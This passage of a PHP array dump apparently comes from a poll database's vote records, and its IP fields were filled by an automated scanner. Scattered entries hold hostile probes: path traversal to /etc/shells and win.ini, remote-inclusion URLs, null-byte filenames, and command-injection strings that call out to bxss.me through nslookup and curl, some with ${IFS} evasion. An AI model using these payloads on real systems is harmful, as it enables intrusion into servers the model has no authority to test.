'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 798 => array(
'id' => '1341',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 799 => array(
'id' => '1342',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 800 => array(
'id' => '1343',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 801 => array(
'id' => '1344',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 802 => array(
'id' => '1345',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 803 => array(
'id' => '1346',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 804 => array(
'id' => '1347',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 805 => array(
'id' => '1348',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 806 => array(
'id' => '1349',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 807 => array(
'id' => '1350',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 808 => array(
'id' => '1351',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 809 => array(
'id' => '1352',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 810 => array(
'id' => '1353',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 811 => array(
'id' => '1354',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 812 => array(
'id' => '1355',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 813 => array(
'id' => '1356',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 814 => array(
'id' => '1357',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 815 => array(
'id' => '1358',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 816 => array(
'id' => '1359',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 817 => array(
'id' => '1360',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 818 => array(
'id' => '1361',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 819 => array(
'id' => '1362',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 820 => array(
'id' => '1363',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 821 => array(
'id' => '1364',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 822 => array(
'id' => '1365',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 823 => array(
'id' => '1366',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 824 => array(
'id' => '1367',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 825 => array(
'id' => '1368',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 826 => array(
'id' => '1369',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 827 => array(
'id' => '1370',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 828 => array(
'id' => '1371',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 829 => array(
'id' => '1372',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 830 => array(
'id' => '1373',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 831 => array(
'id' => '1374',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 832 => array(
'id' => '1375',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 833 => array(
'id' => '1376',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 834 => array(
'id' => '1377',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 835 => array(
'id' => '1378',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 836 => array(
'id' => '1379',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 837 => array(
'id' => '1380',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 838 => array(
'id' => '1381',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 839 => array(
'id' => '1382',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 840 => array(
'id' => '1383',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 841 => array(
'id' => '1384',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 842 => array(
'id' => '1385',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 843 => array(
'id' => '1386',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 844 => array(
'id' => '1387',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 845 => array(
'id' => '1388',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 846 => array(
'id' => '1389',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 847 => array(
'id' => '1390',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 848 => array(
'id' => '1391',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 849 => array(
'id' => '1392',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 850 => array(
'id' => '1393',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 851 => array(
'id' => '1394',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 852 => array(
'id' => '1395',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 853 => array(
'id' => '1396',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 854 => array(
'id' => '1397',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 855 => array(
'id' => '1398',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 856 => array(
'id' => '1399',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 857 => array(
'id' => '1400',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 858 => array(
'id' => '1401',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 859 => array(
'id' => '1402',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 860 => array(
'id' => '1403',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 861 => array(
'id' => '1404',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 862 => array(
'id' => '1405',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 863 => array(
'id' => '1406',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 864 => array(
'id' => '1407',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 865 => array(
'id' => '1408',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 866 => array(
'id' => '1409',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 867 => array(
'id' => '1410',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 868 => array(
'id' => '1411',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 869 => array(
'id' => '1412',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 870 => array(
'id' => '1413',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 871 => array(
'id' => '1414',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 872 => array(
'id' => '1415',
'ip' => ')',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 873 => array(
'id' => '1416',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 874 => array(
'id' => '1417',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 875 => array(
'id' => '1418',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 876 => array(
'id' => '1419',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 877 => array(
'id' => '1420',
'ip' => '!(()&&!|*|*|',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 878 => array(
'id' => '1421',
'ip' => '^(#$!@#$)(()))******',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 879 => array(
'id' => '1422',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 880 => array(
'id' => '1423',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 881 => array(
'id' => '1424',
'ip' => '45.84.137.43',
'ip1' => ')',
'sondage_id' => '2'
),
(int) 882 => array(
'id' => '1425',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 883 => array(
'id' => '1426',
'ip' => '45.84.137.43',
'ip1' => '!(()&&!|*|*|',
'sondage_id' => '2'
),
(int) 884 => array(
'id' => '1427',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 885 => array(
'id' => '1428',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 886 => array(
'id' => '1429',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 887 => array(
'id' => '1430',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 888 => array(
'id' => '1431',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 889 => array(
'id' => '1432',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 890 => array(
'id' => '1433',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 891 => array(
'id' => '1434',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 892 => array(
'id' => '1435',
'ip' => '45.84.137.43',
'ip1' => '^(#$!@#$)(()))******',
'sondage_id' => '2'
),
(int) 893 => array(
'id' => '1436',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 894 => array(
'id' => '1437',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 895 => array(
'id' => '1438',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 896 => array(
'id' => '1439',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 897 => array(
'id' => '1440',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 898 => array(
'id' => '1441',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 899 => array(
'id' => '1442',
'ip' => '45.84.137.43',
'ip1' => '<pre class=&n926989=v912391',
'sondage_id' => '2'
),
(int) 900 => array(
'id' => '1443',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 901 => array(
'id' => '1444',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 902 => array(
'id' => '1445',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 903 => array(
'id' => '1446',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 904 => array(
'id' => '1447',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 905 => array(
'id' => '1448',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 906 => array(
'id' => '1449',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 907 => array(
'id' => '1450',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 908 => array(
'id' => '1451',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 909 => array(
'id' => '1452',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 910 => array(
'id' => '1453',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 911 => array(
'id' => '1454',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 912 => array(
'id' => '1455',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 913 => array(
'id' => '1456',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 914 => array(
'id' => '1457',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 915 => array(
'id' => '1458',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 916 => array(
'id' => '1459',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 917 => array(
'id' => '1460',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 918 => array(
'id' => '1461',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 919 => array(
'id' => '1462',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 920 => array(
'id' => '1463',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 921 => array(
'id' => '1464',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 922 => array(
'id' => '1465',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 923 => array(
'id' => '1466',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 924 => array(
'id' => '1467',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 925 => array(
'id' => '1468',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 926 => array(
'id' => '1469',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 927 => array(
'id' => '1470',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 928 => array(
'id' => '1471',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 929 => array(
'id' => '1472',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 930 => array(
'id' => '1473',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 931 => array(
'id' => '1474',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 932 => array(
'id' => '1475',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 933 => array(
'id' => '1476',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 934 => array(
'id' => '1477',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 935 => array(
'id' => '1478',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 936 => array(
'id' => '1479',
'ip' => '/etc/shells',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 937 => array(
'id' => '1480',
'ip' => 'c:/windows/win.ini',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 938 => array(
'id' => '1481',
'ip' => 'bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 939 => array(
'id' => '1482',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 940 => array(
'id' => '1483',
'ip' => '45.84.137.43',
'ip1' => 'http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg',
'sondage_id' => '2'
),
(int) 941 => array(
'id' => '1484',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 942 => array(
'id' => '1485',
'ip' => '45.84.137.43',
'ip1' => '1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg',
'sondage_id' => '2'
),
(int) 943 => array(
'id' => '1486',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 944 => array(
'id' => '1487',
'ip' => '45.84.137.43',
'ip1' => 'Http://bxss.me/t/fit.txt',
'sondage_id' => '2'
),
(int) 945 => array(
'id' => '1488',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 946 => array(
'id' => '1489',
'ip' => '45.84.137.43',
'ip1' => 'http://bxss.me/t/fit.txt%3F.jpg',
'sondage_id' => '2'
),
(int) 947 => array(
'id' => '1490',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 948 => array(
'id' => '1491',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 949 => array(
'id' => '1492',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 950 => array(
'id' => '1493',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 951 => array(
'id' => '1494',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 952 => array(
'id' => '1495',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 953 => array(
'id' => '1496',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 954 => array(
'id' => '1497',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 955 => array(
'id' => '1498',
'ip' => '45.84.137.43',
'ip1' => '/etc/shells',
'sondage_id' => '2'
),
(int) 956 => array(
'id' => '1499',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 957 => array(
'id' => '1500',
'ip' => '45.84.137.43',
'ip1' => '../../../../../../../../../../../../../../etc/shells',
'sondage_id' => '2'
),
(int) 958 => array(
'id' => '1501',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 959 => array(
'id' => '1502',
'ip' => '45.84.137.43',
'ip1' => 'c:/windows/win.ini',
'sondage_id' => '2'
),
(int) 960 => array(
'id' => '1503',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 961 => array(
'id' => '1504',
'ip' => '45.84.137.43',
'ip1' => 'bxss.me',
'sondage_id' => '2'
),
(int) 962 => array(
'id' => '1505',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 963 => array(
'id' => '1506',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 964 => array(
'id' => '1507',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 965 => array(
'id' => '1508',
'ip' => '45.84.137.43',
'ip1' => 'echo wrkyxx$()\ ktsafo\nz^xyu||a #' &echo wrkyxx$()\ ktsafo\nz^xyu||a #|" &echo wrkyxx$()\ ktsafo\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 966 => array(
'id' => '1509',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 967 => array(
'id' => '1510',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 968 => array(
'id' => '1511',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 969 => array(
'id' => '1512',
'ip' => '45.84.137.43',
'ip1' => '&echo ojuugj$()\ kgxyxr\nz^xyu||a #' &echo ojuugj$()\ kgxyxr\nz^xyu||a #|" &echo ojuugj$()\ kgxyxr\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 970 => array(
'id' => '1513',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 971 => array(
'id' => '1514',
'ip' => '45.84.137.43',
'ip1' => '<pre class=&echo dkoqpy$()\ jhzsve\nz^xyu||a #' &echo dkoqpy$()\ jhzsve\nz^xyu||a #|" &echo dkoqpy$()\ jhzsve\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 972 => array(
'id' => '1515',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 973 => array(
'id' => '1516',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 974 => array(
'id' => '1517',
'ip' => '45.84.137.43',
'ip1' => '|echo hkgcbt$()\ dguohv\nz^xyu||a #' |echo hkgcbt$()\ dguohv\nz^xyu||a #|" |echo hkgcbt$()\ dguohv\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 975 => array(
'id' => '1518',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 976 => array(
'id' => '1519',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 977 => array(
'id' => '1520',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 978 => array(
'id' => '1521',
'ip' => '45.84.137.43',
'ip1' => '<pre class=|echo hefevc$()\ wqoxsm\nz^xyu||a #' |echo hefevc$()\ wqoxsm\nz^xyu||a #|" |echo hefevc$()\ wqoxsm\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 979 => array(
'id' => '1522',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 980 => array(
'id' => '1523',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 981 => array(
'id' => '1524',
'ip' => '45.84.137.43',
'ip1' => '(nslookup -q=cname hitbasbcjngrcf3683.bxss.me||curl hitbasbcjngrcf3683.bxss.me))',
'sondage_id' => '2'
),
(int) 982 => array(
'id' => '1525',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 983 => array(
'id' => '1526',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 984 => array(
'id' => '1527',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 985 => array(
'id' => '1528',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 986 => array(
'id' => '1529',
'ip' => '45.84.137.43',
'ip1' => '$(nslookup -q=cname hitjsxfzremdl8f703.bxss.me||curl hitjsxfzremdl8f703.bxss.me)',
'sondage_id' => '2'
),
(int) 987 => array(
'id' => '1530',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 988 => array(
'id' => '1531',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 989 => array(
'id' => '1532',
'ip' => '45.84.137.43',
'ip1' => '&nslookup -q=cname hitqtataqzgrudc605.bxss.me&'\"`0&nslookup -q=cname hitqtataqzgrudc605.bxss.me&`'',
'sondage_id' => '2'
),
(int) 990 => array(
'id' => '1533',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 991 => array(
'id' => '1534',
'ip' => '45.84.137.43',
'ip1' => '&(nslookup -q=cname hiteygpjwwuzv48935.bxss.me||curl hiteygpjwwuzv48935.bxss.me)&'\"`0&(nslookup -q=cname hiteygpjwwuzv48935.bxss.me||curl hiteygpjwwuzv48935.bxss.me)&`'',
'sondage_id' => '2'
),
(int) 992 => array(
'id' => '1535',
'ip' => '45.84.137.43',
'ip1' => '|(nslookup -q=cname hityqjlzplybx3d281.bxss.me||curl hityqjlzplybx3d281.bxss.me)',
'sondage_id' => '2'
),
(int) 993 => array(
'id' => '1536',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 994 => array(
'id' => '1537',
'ip' => '45.84.137.43',
'ip1' => '`(nslookup -q=cname hitcgojkocoww7b0b2.bxss.me||curl hitcgojkocoww7b0b2.bxss.me)`',
'sondage_id' => '2'
),
(int) 995 => array(
'id' => '1538',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 996 => array(
'id' => '1539',
'ip' => '45.84.137.43',
'ip1' => ';(nslookup -q=cname hitzmelsicxgi6d04e.bxss.me||curl hitzmelsicxgi6d04e.bxss.me)|(nslookup -q=cname hitzmelsicxgi6d04e.bxss.me||curl hitzmelsicxgi6d04e.bxss.me)&(nslookup -q=cname hitzmelsicxgi6d04e.bxss.me||curl hitzmelsicxgi6d04e.bxss.me)',
'sondage_id' => '2'
),
(int) 997 => array(
'id' => '1540',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 998 => array(
'id' => '1541',
'ip' => '45.84.137.43',
'ip1' => '|(nslookup${IFS}-q${IFS}cname${IFS}hitndecjhbuzaa57d4.bxss.me||curl${IFS}hitndecjhbuzaa57d4.bxss.me)',
'sondage_id' => '2'
),
(int) 999 => array(
'id' => '1542',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1000 => array(
'id' => '1543',
'ip' => '45.84.137.43',
'ip1' => '&(nslookup${IFS}-q${IFS}cname${IFS}hitzoajexvdcy641c7.bxss.me||curl${IFS}hitzoajexvdcy641c7.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitzoajexvdcy641c7.bxss.me||curl${IFS}hitzoajexvdcy641c7.bxss.me)&`'',
'sondage_id' => '2'
),
(int) 1001 => array(
'id' => '1544',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1002 => array(
'id' => '1545',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1003 => array(
'id' => '1546',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1004 => array(
'id' => '1547',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1005 => array(
'id' => '1548',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1006 => array(
'id' => '1549',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1007 => array(
'id' => '1550',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1008 => array(
'id' => '1551',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1009 => array(
'id' => '1552',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1010 => array(
'id' => '1553',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1011 => array(
'id' => '1554',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1012 => array(
'id' => '1555',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1013 => array(
'id' => '1556',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1014 => array(
'id' => '1557',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1015 => array(
'id' => '1558',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1016 => array(
'id' => '1559',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1017 => array(
'id' => '1560',
'ip' => '45.84.137.43',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
